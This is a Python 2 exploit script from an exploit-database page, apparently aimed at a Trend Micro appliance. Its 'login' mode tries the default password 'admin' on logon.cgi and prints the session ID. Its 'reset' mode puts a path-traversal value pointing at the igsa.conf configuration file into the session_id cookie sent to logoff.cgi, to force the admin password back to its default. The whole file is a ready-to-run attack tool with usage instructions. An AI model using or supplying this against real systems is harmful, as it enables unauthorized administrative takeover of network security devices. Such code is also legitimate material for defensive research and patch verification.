## https://sploitus.com/exploit?id=SSV:92981
import re
import os
import sys
import time
import requests
import threading
requests.packages.urllib3.disable_warnings()
if len(sys.argv) != 3:
print "(+) usage: %s <target> <option [reset][login]>" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 reset" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 login" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
o = sys.argv[2]
bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu
o_url = "%scgi-bin/logoff.cgi" % bu
if o.lower() == "login":
# default password
r = requests.post(l_url, data={ "passwd":"admin", "isCookieEnable":1 }, verify=False)
if "frame.cgi" in r.text:
print "(+) logged in..."
match = re.search("session_id=(.*); path", r.headers['set-cookie'])
if match:
print "(+) authenticated session_id: %s" % match.group(1)
else:
print "(-) login failed"
elif o.lower() == "reset":
print "(+) resetting the default password..."
r = requests.get(o_url, cookies={"session_id":"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"}, verify=False)
# causes an uninitialized free() vulnerability as well...
if "Memory map" in r.text:
print "(+) success! now wait for a reboot..."
else:
print "(-) not a valid option!"